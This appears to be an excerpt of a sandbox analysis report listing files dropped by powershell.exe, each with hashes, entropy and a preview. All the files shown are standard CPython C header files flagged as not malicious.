                              Preview:#ifndef Py_CPYTHON_CEVAL_H..# error "this header file must not be included directly"..#endif....PyAPI_FUNC(void) PyEval_SetProfile(Py_tracefunc, PyObject *);..PyAPI_FUNC(void) PyEval_SetProfileAllThreads(Py_tracefunc, PyObject *);..PyAPI_DATA(int) _PyEval_SetProfile(PyThreadState *tstate, Py_tracefunc func, PyObject *arg);..PyAPI_FUNC(void) PyEval_SetTrace(Py_tracefunc, PyObject *);..PyAPI_FUNC(void) PyEval_SetTraceAllThreads(Py_tracefunc, PyObject *);..PyAPI_FUNC(int) _PyEval_SetTrace(PyThreadState *tstate, Py_tracefunc func, PyObject *arg);..../* Helper to look up a builtin object */..PyAPI_FUNC(PyObject *) _PyEval_GetBuiltin(PyObject *);..PyAPI_FUNC(PyObject *) _PyEval_GetBuiltinId(_Py_Identifier *);../* Look at the current frame's (if any) code's co_flags, and turn on.. the corresponding compiler flags in cf->cf_flags. Return 1 if any.. flag was set, else return 0. */..PyAPI_FUNC(int) PyEval_MergeCompilerFlags(PyCompilerFlags *cf);....PyAPI_FUNC(PyObject *) _PyEval_EvalFrameD
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2316
                              Entropy (8bit):5.206587813585113
                              Encrypted:false
                              SSDEEP:48:5F6eM2GTwXC7hE27Yr+55E9pTRJjR7EGq+JdR7IME1LJH5s9CRyR0TzIS:5keGRT6R1RjbRoZLRyRGf
                              MD5:E4CE5AD4B9585885C56F7D40139402E0
                              SHA1:37E9DDE5DB6AF688E249FEA775C0DBD8A25EA1DA
                              SHA-256:67036807D38844CE2BB25D7BB68D77D82EE27C256E87E6C12E8EB309F8D7B726
                              SHA-512:F697A62A6CCC5F17A9097B48929D32CC8C0013ED33584A99EAC6293F656E70DB64978D1F10659BB6EAF8782F28FF9AF3200F2E798CC03AD10BA7A5832960A484
                              Malicious:false
                              Preview:/* Former class object interface -- now only bound methods are here */..../* Revealing some structures (not for general use) */....#ifndef Py_LIMITED_API..#ifndef Py_CLASSOBJECT_H..#define Py_CLASSOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....typedef struct {.. PyObject_HEAD.. PyObject *im_func; /* The callable object implementing the method */.. PyObject *im_self; /* The instance it is bound to */.. PyObject *im_weakreflist; /* List of weak references */.. vectorcallfunc vectorcall;..} PyMethodObject;....PyAPI_DATA(PyTypeObject) PyMethod_Type;....#define PyMethod_Check(op) Py_IS_TYPE((op), &PyMethod_Type)....PyAPI_FUNC(PyObject *) PyMethod_New(PyObject *, PyObject *);....PyAPI_FUNC(PyObject *) PyMethod_Function(PyObject *);..PyAPI_FUNC(PyObject *) PyMethod_Self(PyObject *);....#define _PyMethod_CAST(meth) \.. (assert(PyMethod_Check(meth)), _Py_CAST(PyMethodObject*, meth))..../* Static inline functions for direct access to these values... Type checks ar
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):16577
                              Entropy (8bit):4.753162605991559
                              Encrypted:false
                              SSDEEP:192:E6Cj9DR9YePqYgeR/3Fz5+C+Pus1SmlRwjm1K+tiUK72MFjq1ULzx9zCKmSXsso5:un+gqHeR/N5e2DmlRUo71Ix9zCKJo5
                              MD5:1BA3E1C8B7F3B32E86912E9716B033B6
                              SHA1:C451F33BD817499C5C9FE5BFB631083F7684EB0E
                              SHA-256:97437824356AD6332868250B7276172D61F8B67BBEA7B7796E97221AE109FF3E
                              SHA-512:99B78835D502526FF045CA1DFFDE52292D802C446EE4F11CECAE0EFC84F518114017CF5451C8FCF6A77565EDD5B13343BC1E21C4386AE5A158552449C9F9EF9A
                              Malicious:false
                              Preview:/* Definitions for bytecode */....#ifndef Py_LIMITED_API..#ifndef Py_CODE_H..#define Py_CODE_H....#ifdef __cplusplus..extern "C" {..#endif..../* Count of all local monitoring events */..#define _PY_MONITORING_LOCAL_EVENTS 10../* Count of all "real" monitoring events (not derived from other events) */..#define _PY_MONITORING_UNGROUPED_EVENTS 15../* Count of all monitoring events */..#define _PY_MONITORING_EVENTS 17..../* Tables of which tools are active for each monitored event. */../* For 3.12 ABI compatibility this is over sized */..typedef struct _Py_LocalMonitors {.. /* Only _PY_MONITORING_LOCAL_EVENTS of these are used */.. uint8_t tools[_PY_MONITORING_UNGROUPED_EVENTS];..} _Py_LocalMonitors;....typedef struct _Py_GlobalMonitors {.. uint8_t tools[_PY_MONITORING_UNGROUPED_EVENTS];..} _Py_GlobalMonitors;..../* Each instruction in a code object is a fixed-width value,.. * currently 2 bytes: 1-byte opcode + 1-byte oparg. The EXTENDED_ARG.. * opcode allows for larger values
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2729
                              Entropy (8bit):5.285712770317982
                              Encrypted:false
                              SSDEEP:48:mp2cgBUtRkNT39eEswzixA+yqvqNVJ8Nc36hlI4fmdJ+msra5PKYrFUVdq0RIduc:mocbS539eEBzi+JqvKg6aFfmKm+68nta
                              MD5:5949D1A2D57ECDC569772087C656729A
                              SHA1:B6180B0749151AC9803FDB7FE8B57F76D6B082CE
                              SHA-256:6FC10C4B043E72CFD684D28F3A2227DD29D50AE5632B76F08A1BC73B74814F78
                              SHA-512:65B8DD591470CEE8C16BAB7F17FFCC5E54AD0C4A9F300EABBA35690BCCD7D36DD1AE9780908AF2E5DEC514BD3E66E27F47C60B475CAF28DDE323C28D1CF92F17
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_COMPILE_H..# error "this header file must not be included directly"..#endif..../* Public interface */..#define PyCF_MASK (CO_FUTURE_DIVISION | CO_FUTURE_ABSOLUTE_IMPORT | \.. CO_FUTURE_WITH_STATEMENT | CO_FUTURE_PRINT_FUNCTION | \.. CO_FUTURE_UNICODE_LITERALS | CO_FUTURE_BARRY_AS_BDFL | \.. CO_FUTURE_GENERATOR_STOP | CO_FUTURE_ANNOTATIONS)..#define PyCF_MASK_OBSOLETE (CO_NESTED)..../* bpo-39562: CO_FUTURE_ and PyCF_ constants must be kept unique... PyCF_ constants can use bits from 0x0100 to 0x10000... CO_FUTURE_ constants use bits starting at 0x20000. */..#define PyCF_SOURCE_IS_UTF8 0x0100..#define PyCF_DONT_IMPLY_DEDENT 0x0200..#define PyCF_ONLY_AST 0x0400..#define PyCF_IGNORE_COOKIE 0x0800..#define PyCF_TYPE_COMMENTS 0x1000..#define PyCF_ALLOW_TOP_LEVEL_AWAIT 0x2000..#define PyCF_ALLOW_INCOMPLETE_INPUT 0x4000..#define PyCF_COMPILE_MASK (PyCF_ONLY_AST | PyCF_ALLOW_TOP_LEVEL_AWAIT | \..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1292
                              Entropy (8bit):5.139223578690183
                              Encrypted:false
                              SSDEEP:24:1wxib+xhH30pPiRDd/Of+JxyyYHlyt8zK5qYyN:1cgYw6do+/rYHgt8zEFyN
                              MD5:4DFEFE2CF6776C4087A404A44E3ED705
                              SHA1:35589BF1FD6E0875F9D6EA438D93431FA803CA6D
                              SHA-256:CD2BAB68EC67777D71D1E7EC4D33A2D29F96C5145E33D49E101CCDA692934BAE
                              SHA-512:52CD1A6E0F59FA9BA6E6D7B01B13B72B303A54C3B7D4710EF9079B5000A6D25F30D9785392E78BBB7D2559A78C5D4CE830B69A81B083DA96CB0204F7BD540B19
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_COMPLEXOBJECT_H..# error "this header file must not be included directly"..#endif....typedef struct {.. double real;.. double imag;..} Py_complex;..../* Operations on complex numbers from complexmodule.c */....PyAPI_FUNC(Py_complex) _Py_c_sum(Py_complex, Py_complex);..PyAPI_FUNC(Py_complex) _Py_c_diff(Py_complex, Py_complex);..PyAPI_FUNC(Py_complex) _Py_c_neg(Py_complex);..PyAPI_FUNC(Py_complex) _Py_c_prod(Py_complex, Py_complex);..PyAPI_FUNC(Py_complex) _Py_c_quot(Py_complex, Py_complex);..PyAPI_FUNC(Py_complex) _Py_c_pow(Py_complex, Py_complex);..PyAPI_FUNC(double) _Py_c_abs(Py_complex);..../* Complex object interface */..../*..PyComplexObject represents a complex number with double-precision..real and imaginary parts...*/..typedef struct {.. PyObject_HEAD.. Py_complex cval;..} PyComplexObject;....PyAPI_FUNC(PyObject *) PyComplex_FromCComplex(Py_complex);....PyAPI_FUNC(Py_complex) PyComplex_AsCComplex(PyObject *op);....#ifdef Py_BUILD_CORE../* Format t
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2043
                              Entropy (8bit):5.209648903025274
                              Encrypted:false
                              SSDEEP:48:0QHsjzPmEiD5PagHyRj29q/R7v9Dg0Bf9p9qmdfsD0+:VszPmLlPDy1TBL9qmlsD0+
                              MD5:8F1D0EE8D5483001F6FF41734F354389
                              SHA1:6269AF3AFF52AE81484AF58F948053EB638AB37E
                              SHA-256:DAE99CC7F7327EF3E797D5E016B957C6FA3CE4880F4478AC97B206DCE4568259
                              SHA-512:7596CE7CCDBAD4AA1B6B328825059B3BD1B27FF8F7626C5C52FD9510AD2B1CD911970DBA63C54ABB5BA7936FE4BED3D86ED7B3F8E36F76E1C3E081B7159FB987
                              Malicious:false
                              Preview:#ifndef Py_LIMITED_API..#ifndef Py_CONTEXT_H..#define Py_CONTEXT_H..#ifdef __cplusplus..extern "C" {..#endif....PyAPI_DATA(PyTypeObject) PyContext_Type;..typedef struct _pycontextobject PyContext;....PyAPI_DATA(PyTypeObject) PyContextVar_Type;..typedef struct _pycontextvarobject PyContextVar;....PyAPI_DATA(PyTypeObject) PyContextToken_Type;..typedef struct _pycontexttokenobject PyContextToken;......#define PyContext_CheckExact(o) Py_IS_TYPE((o), &PyContext_Type)..#define PyContextVar_CheckExact(o) Py_IS_TYPE((o), &PyContextVar_Type)..#define PyContextToken_CheckExact(o) Py_IS_TYPE((o), &PyContextToken_Type)......PyAPI_FUNC(PyObject *) PyContext_New(void);..PyAPI_FUNC(PyObject *) PyContext_Copy(PyObject *);..PyAPI_FUNC(PyObject *) PyContext_CopyCurrent(void);....PyAPI_FUNC(int) PyContext_Enter(PyObject *);..PyAPI_FUNC(int) PyContext_Exit(PyObject *);....../* Create a new context variable..... default_value can be NULL...*/..PyAPI_FUNC(PyObject *) PyContextVar_New(.. const char *nam
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1706
                              Entropy (8bit):4.913239676928551
                              Encrypted:false
                              SSDEEP:48:0cgl1a/BKr2S03SuCaafSz7iS8SEma4O3:0cx7Sd/Faz7RTB4
                              MD5:940E4DB2ACBBFBD91EE392EB0C661202
                              SHA1:3531E8AC632E6C609AA5C2158096116D63330205
                              SHA-256:F00CA429993329A665C9CD2DE348321712B950B4EFED2E9C05DE6C16EB2E0DDB
                              SHA-512:5FFD6B6CC2AE290CF8B745918DFC651A677993617102D91BFEED7B4E7065FA106364306B2D829B14A9FD5A9865FA11D132305DCCB9BB6C6AB240A30FF674A875
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_DESCROBJECT_H..# error "this header file must not be included directly"..#endif....typedef PyObject *(*wrapperfunc)(PyObject *self, PyObject *args,.. void *wrapped);....typedef PyObject *(*wrapperfunc_kwds)(PyObject *self, PyObject *args,.. void *wrapped, PyObject *kwds);....struct wrapperbase {.. const char *name;.. int offset;.. void *function;.. wrapperfunc wrapper;.. const char *doc;.. int flags;.. PyObject *name_strobj;..};..../* Flags for above struct */..#define PyWrapperFlag_KEYWORDS 1 /* wrapper function takes keyword args */..../* Various kinds of descriptor objects */....typedef struct {.. PyObject_HEAD.. PyTypeObject *d_type;.. PyObject *d_name;.. PyObject *d_qualname;..} PyDescrObject;....#define PyDescr_COMMON PyDescrObject d_common....#define PyDescr_TYPE(x) (((PyDescrObject *)(x))->d_type)..#define PyDescr_NAME(x) (((PyDescrObject *)(x))->d_name)....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4804
                              Entropy (8bit):5.086936822611704
                              Encrypted:false
                              SSDEEP:96:pcTR1vYJuOeuOvuLK/aTVCSl3hioPLCXoLE7PpPq3UDyI8O:GNOsOxO2lh1zCYsRC37I8O
                              MD5:C79D4F29F1C2A2FC82AB82FCBFD09F6C
                              SHA1:610D12152561D6875BF0E6DE78A3B4F8001F5151
                              SHA-256:C7CE4DDA5C84FC6C5DA636F2FDDA42C21B458859E87B8CF6205544A893097D03
                              SHA-512:1D51853308CFCD9103893E3286A6C14E84A929B7B1416087CE28FFDE9CEEE9083AA8140F9855155494D0A6195641152E3CAA2B0C99371B7AD1FA6DEBA779CFAC
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_DICTOBJECT_H..# error "this header file must not be included directly"..#endif....typedef struct _dictkeysobject PyDictKeysObject;..typedef struct _dictvalues PyDictValues;..../* The ma_values pointer is NULL for a combined table.. * or points to an array of PyObject* for a split table.. */..typedef struct {.. PyObject_HEAD.... /* Number of items in the dictionary */.. Py_ssize_t ma_used;.... /* Dictionary version: globally unique, value change each time.. the dictionary is modified */..#ifdef Py_BUILD_CORE.. uint64_t ma_version_tag;..#else.. Py_DEPRECATED(3.12) uint64_t ma_version_tag;..#endif.... PyDictKeysObject *ma_keys;.... /* If ma_values is NULL, the table is "combined": keys and values.. are stored in ma_keys..... If ma_values is not NULL, the table is split:.. keys are stored in ma_keys and values are stored in ma_values */.. PyDictValues *ma_values;..} PyDictObject;....PyAPI_FUNC(PyObject *) _PyDict_GetIte
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):837
                              Entropy (8bit):5.193069954764856
                              Encrypted:false
                              SSDEEP:24:ljlwxibnNI1NygWEjU3GJLUlnSg7IHBtky:lRcgnNUNIC9d0Sg7IHz5
                              MD5:2D0D5860216CE08799A13DDDEE21046E
                              SHA1:FE3723823B06A90864E2B44C6EB8AD93E7C1FDE0
                              SHA-256:8314B7D514F96FB7212C8DE48443C440D017F25071A81E2DE8734FD354138814
                              SHA-512:D2CBEE84891E4200876C2C44C1A920EC5B34F07DD7076A1587D6EAA0507332BD78BCC58BAD0FD1A93E2FA212D44BCBEBC993B5F1C6F69773A6778429BC7E4ECE
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_FILEOBJECT_H..# error "this header file must not be included directly"..#endif....PyAPI_FUNC(char *) Py_UniversalNewlineFgets(char *, int, FILE*, PyObject *);..PyAPI_FUNC(char *) _Py_UniversalNewlineFgetsWithSize(char *, int, FILE*, PyObject *, size_t*);..../* The std printer acts as a preliminary sys.stderr until the new io.. infrastructure is in place. */..PyAPI_FUNC(PyObject *) PyFile_NewStdPrinter(int);..PyAPI_DATA(PyTypeObject) PyStdPrinter_Type;....typedef PyObject * (*Py_OpenCodeHookFunction)(PyObject *, void *);....PyAPI_FUNC(PyObject *) PyFile_OpenCode(const char *utf8path);..PyAPI_FUNC(PyObject *) PyFile_OpenCodeObject(PyObject *path);..PyAPI_FUNC(int) PyFile_SetOpenCodeHook(Py_OpenCodeHookFunction hook, void *userData);....PyAPI_FUNC(int) _PyLong_FileDescriptor_Converter(PyObject *, void *);..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):240
                              Entropy (8bit):5.0072586187879855
                              Encrypted:false
                              SSDEEP:6:BLgF9ov/HQxz2bBAERZHGdZXGEWyye8Ve67bJRCa8Bpey:BLoU/HQxib2EWbnW7LVPpy
                              MD5:77E359584D56C653096E3495E48F2A0A
                              SHA1:798CC7DEECC669D96019F53F3C633F78BEAFD8B8
                              SHA-256:BFD7F53CBA3C135801C129087BC84866312DD998ED7E1EC13B30CB2A800F3704
                              SHA-512:BAB6D1CCA957699CD282E5B1F415FBB92B51AFCE39A3B4B207E155010C34FE4D47AB2E17CF73332D10DA6239941A04C7144317F5436F71DEA927E9D8B5B0EE45
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_FILEUTILS_H..# error "this header file must not be included directly"..#endif....// Used by _testcapi which must not use the internal C API..PyAPI_FUNC(FILE*) _Py_fopen_obj(.. PyObject *path,.. const char *mode);..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):927
                              Entropy (8bit):5.231380546122055
                              Encrypted:false
                              SSDEEP:24:tJwxib+xsyyxV1VsHTmRBaqOm7q7mrPEWPhIWPj:tJcgYsxxrVszmRBafUI0PEWPeWPj
                              MD5:8B73393791F403ED0A20F9DF6BA63D52
                              SHA1:38449C1812FD8BF0E601C97D4D35DD41355B7E33
                              SHA-256:DCE978016FA9D32AD9F3679C9B1B6E614B727B323B2527E0298F23331DAC804B
                              SHA-512:88FB37C3AE0A8C68247FF739BD51BDA604A99EEF50EB0ECDD8A4D19022428B4C9E91B072A6B45C2C2254D92FB7B6CEA8A372E6F568925DF278CEA348616A02F3
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_FLOATOBJECT_H..# error "this header file must not be included directly"..#endif....typedef struct {.. PyObject_HEAD.. double ob_fval;..} PyFloatObject;....#define _PyFloat_CAST(op) \.. (assert(PyFloat_Check(op)), _Py_CAST(PyFloatObject*, op))....// Static inline version of PyFloat_AsDouble() trading safety for speed...// It doesn't check if op is a double object...static inline double PyFloat_AS_DOUBLE(PyObject *op) {.. return _PyFloat_CAST(op)->ob_fval;..}..#define PyFloat_AS_DOUBLE(op) PyFloat_AS_DOUBLE(_PyObject_CAST(op))......PyAPI_FUNC(int) PyFloat_Pack2(double x, char *p, int le);..PyAPI_FUNC(int) PyFloat_Pack4(double x, char *p, int le);..PyAPI_FUNC(int) PyFloat_Pack8(double x, char *p, int le);....PyAPI_FUNC(double) PyFloat_Unpack2(const char *p, int le);..PyAPI_FUNC(double) PyFloat_Unpack4(const char *p, int le);..PyAPI_FUNC(double) PyFloat_Unpack8(const char *p, int le);..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1137
                              Entropy (8bit):4.903757833245492
                              Encrypted:false
                              SSDEEP:24:GSqgwxibULip8ph97UX412U1YxYDKoO2TdGPzGlWmRl:GS7cgUumpouXeoDToz+Vb
                              MD5:5902B4A048F6428560A52A912B569AE7
                              SHA1:A565C1F713426F2D1CFF116395DBF9CA2C74E0E2
                              SHA-256:833C2CA6C489103C63DAA9701D2A3BD11E2EA14BAEB537A61D4CAB5D50493A7C
                              SHA-512:AC1F95FE7F017614B0BEDBED0B90AC829FD10A56D156310ECB3032CCF0180D8C5F61570FB8FAB873AB82853BDFCD858F70C8647FED7F052A025E574830E5B232
                              Malicious:false
                              Preview:/* Frame object interface */....#ifndef Py_CPYTHON_FRAMEOBJECT_H..# error "this header file must not be included directly"..#endif..../* Standard object interface */....PyAPI_FUNC(PyFrameObject *) PyFrame_New(PyThreadState *, PyCodeObject *,.. PyObject *, PyObject *);..../* The rest of the interface is specific for frame objects */..../* Conversions between "fast locals" and locals in dictionary */....PyAPI_FUNC(void) PyFrame_LocalsToFast(PyFrameObject *, int);..../* -- Caveat emptor --.. * The concept of entry frames is an implementation detail of the CPython.. * interpreter. This API is considered unstable and is provided for the.. * convenience of debuggers, profilers and state-inspecting tools. Notice that.. * this API can be changed in future minor versions if the underlying frame.. * mechanism change or the concept of an 'entry frame' or its semantics becomes.. * obsolete or outdated. */....PyAPI_FUNC(int) _PyFrame_IsEntryFrame(PyFrameObjec
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):7338
                              Entropy (8bit):5.1622423296866335
                              Encrypted:false
                              SSDEEP:192:96qUpUfRKIR1jIRwvIRhAtIRg2IR4KIRR1IR+Faa8Z:gqUORKK1jKwvKWtKg2K4KKR1K+Fal
                              MD5:F7ACA6238FFFCECE1F959EB7FB7F91D1
                              SHA1:F4571B635B99D8DEB3011B50C321B220B25897FD
                              SHA-256:F5C7DC476D9420E43424197F20F700072A2FDB7315D299E9E460A912CEE62939
                              SHA-512:7A5D7F918DF72D0B14AC3D711558098BB70B95AFC9574E0FE649AB288954CA86582148B766F6502F936250CBCB7392397C177A5CA84455FAE1045FB69DFF957C
                              Malicious:false
                              Preview:/* Function object interface */....#ifndef Py_LIMITED_API..#ifndef Py_FUNCOBJECT_H..#define Py_FUNCOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif......#define COMMON_FIELDS(PREFIX) \.. PyObject *PREFIX ## globals; \.. PyObject *PREFIX ## builtins; \.. PyObject *PREFIX ## name; \.. PyObject *PREFIX ## qualname; \.. PyObject *PREFIX ## code; /* A code object, the __code__ attribute */ \.. PyObject *PREFIX ## defaults; /* NULL or a tuple */ \.. PyObject *PREFIX ## kwdefaults; /* NULL or a dict */ \.. PyObject *PREFIX ## closure; /* NULL or a tuple of cell objects */....typedef struct {.. COMMON_FIELDS(fc_)..} PyFrameConstructor;..../* Function objects and code objects should not be confused with each other:.. *.. * Function objects are created by the execution of the 'def' statement... * They reference a code object in their __code__ attribute, which is a.. * purely syntactic object, i.e. nothing more than a compiled version of some.. * source
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3405
                              Entropy (8bit):4.675583115077192
                              Encrypted:false
                              SSDEEP:48:7XhUlI/VuHcOaobPC7fI2jyYtkFrhvr3BLy4:z8yVAiWPUzTtkf7
                              MD5:7823F44F066C4E51523A90ECA985F807
                              SHA1:40DFB3E3489BC4B0AF7204CE70C7BAC6A5A143AC
                              SHA-256:64BE4324F7F9A09E46DBC9997085B04B0B32537A08837073A95BEB2FF4ABCDBA
                              SHA-512:9AB4A28BE2C0258BCDCF79A625AE91F9D40849F0B53B48FA73C5C6F4B22E6C203C2AA6F66E61D6372DCBD818C0721D55E16943B583BAC1BC9BEC5B4D167691C7
                              Malicious:false
                              Preview:/* Generator object interface */....#ifndef Py_LIMITED_API..#ifndef Py_GENOBJECT_H..#define Py_GENOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif..../* --- Generators --------------------------------------------------------- */..../* _PyGenObject_HEAD defines the initial segment of generator.. and coroutine objects. */..#define _PyGenObject_HEAD(prefix) \.. PyObject_HEAD \.. /* List of weak reference. */ \.. PyObject *prefix##_weakreflist; \.. /* Name of the generator. */ \.. PyObject *prefix##_name; \.. /* Qualified name of the generator. */ \.. PyObject *prefix##_qualname; \.. _PyErr_StackItem prefix##_exc_state;
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1669
                              Entropy (8bit):5.0202452456319815
                              Encrypted:false
                              SSDEEP:24:/wxibOvcHWcJQx1cof1ofBRYgGlw1svu4GRfco4G2aJaGR11k:/cgOvl3x1h9EewXeCpk
                              MD5:A6CB48CC7E0F692D2FC13A1976E6926D
                              SHA1:458F01E4BF7F68B5A806392746E723F576CF450F
                              SHA-256:2233CC06D149A194C2185D5C3DB82256833459C51902AE0DF5CD237A6973CB97
                              SHA-512:CF2AB21B74D04712D08089036D73F90C605FF3CDD349E628D97B8325A85F3E935CEC48C3D4AF911BE07A5489A21A7742F1C476242C81806C0AE2F4D9C75AC590
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_IMPORT_H..# error "this header file must not be included directly"..#endif....PyMODINIT_FUNC PyInit__imp(void);....PyAPI_FUNC(int) _PyImport_IsInitialized(PyInterpreterState *);....PyAPI_FUNC(PyObject *) _PyImport_GetModuleId(_Py_Identifier *name);..PyAPI_FUNC(int) _PyImport_SetModule(PyObject *name, PyObject *module);..PyAPI_FUNC(int) _PyImport_SetModuleString(const char *name, PyObject* module);....PyAPI_FUNC(void) _PyImport_AcquireLock(PyInterpreterState *interp);..PyAPI_FUNC(int) _PyImport_ReleaseLock(PyInterpreterState *interp);....PyAPI_FUNC(int) _PyImport_FixupBuiltin(.. PyObject *mod,.. const char *name, /* UTF-8 encoded string */.. PyObject *modules.. );..PyAPI_FUNC(int) _PyImport_FixupExtensionObject(PyObject*, PyObject *,.. PyObject *, PyObject *);....struct _inittab {.. const char *name; /* ASCII encoded string */.. PyObject* (*initfunc)(void);..};..// This is not used a
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8076
                              Entropy (8bit):5.025788943646213
                              Encrypted:false
                              SSDEEP:96:iauwyXtV/fW/VTKNBfwKdfNy+1yQfAH+E22i+xO+haFl/8RCFtCFSkcr0p1u7VOi:B+ZmK3FyXK21Hfu7VTH0e
                              MD5:E785460D0437E300AAE9CC595A419D13
                              SHA1:65BA8DEB5F4307C99B70AF112557FACD335997FE
                              SHA-256:0B77B3C209F8D212D75416338B7E519ECD37D33CC8EF11F4564D64662D59EFE1
                              SHA-512:CB5807FEACBAF258A1909AF7CB289624E66EF076F39CFE33819CA505C171C0D610B675CD63C8D80B267A0CE08E887F53B630218E81F12D61E2903D6F5A59106D
                              Malicious:false
                              Preview:#ifndef Py_PYCORECONFIG_H..#define Py_PYCORECONFIG_H..#ifndef Py_LIMITED_API..#ifdef __cplusplus..extern "C" {..#endif..../* --- PyStatus ----------------------------------------------- */....typedef struct {.. enum {.. _PyStatus_TYPE_OK=0,.. _PyStatus_TYPE_ERROR=1,.. _PyStatus_TYPE_EXIT=2.. } _type;.. const char *func;.. const char *err_msg;.. int exitcode;..} PyStatus;....PyAPI_FUNC(PyStatus) PyStatus_Ok(void);..PyAPI_FUNC(PyStatus) PyStatus_Error(const char *err_msg);..PyAPI_FUNC(PyStatus) PyStatus_NoMemory(void);..PyAPI_FUNC(PyStatus) PyStatus_Exit(int exitcode);..PyAPI_FUNC(int) PyStatus_IsError(PyStatus err);..PyAPI_FUNC(int) PyStatus_IsExit(PyStatus err);..PyAPI_FUNC(int) PyStatus_Exception(PyStatus err);..PyAPI_FUNC(PyObject *) _PyErr_SetFromPyStatus(PyStatus status);..../* --- PyWideStringList ------------------------------------------------ */....typedef struct {.. /* If length is greater than zero, items must be non-NULL.. and all
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):398
                              Entropy (8bit):5.034285965364742
                              Encrypted:false
                              SSDEEP:6:BwS24ds/HQxz2bBAER6QQv8a7Nph6iyeWSbph62oeWSbzRz8PRlzR4KeWuzRM6pd:Bl2R/HQxib2EsQcDXhUnIhYncknUhWPC
                              MD5:3D49C40583E099B05F31BED767B5DA8F
                              SHA1:2C118B60E9A4335A9EA9673AB8D39D94F56B150F
                              SHA-256:07D04990AE07FBEFCDF0DB99ADFD8C1781EAE324A10CE946A837482AA588A679
                              SHA-512:A494775D154938A2A65C30703F152628FE6CE03520EFCECA98610B2FDD3355BB7B538D34F13F732C71FDAF4906FD1A89B19753438FEA2D90026288C7D32D0CE3
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_INTERPRETERIDOBJECT_H..# error "this header file must not be included directly"..#endif..../* Interpreter ID Object */....PyAPI_DATA(PyTypeObject) _PyInterpreterID_Type;....PyAPI_FUNC(PyObject *) _PyInterpreterID_New(int64_t);..PyAPI_FUNC(PyObject *) _PyInterpreterState_GetIDObject(PyInterpreterState *);..PyAPI_FUNC(PyInterpreterState *) _PyInterpreterID_LookUp(PyObject *);..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1680
                              Entropy (8bit):5.1075478875485105
                              Encrypted:false
                              SSDEEP:24:AYwxib+x6ANvXDT3JxKsr/tf4SstZ3X8X/olw0eQkJZoYiYSBW1G+yIk4zjYS3ot:AYcgY6KnfJmLw0ePJZoPYa+y3WjY8o1z
                              MD5:F2EA530A98E222E4BF313F3DFBBE466B
                              SHA1:2A57EB788EF5C5B62A5A16AD478795F947D5B53D
                              SHA-256:D64EC47C66671FE2B216FD49010D149DF3103A6C8BE0D442E429B1DDA6001F5B
                              SHA-512:0048C05043ED750E10A5246F161F555322305C43E675152D2E8A927F774B0F6D41AE535F7185F5406DA5DD4118E04A98C750B186FF73277C9CABEB7B33550485
                              Malicious:false
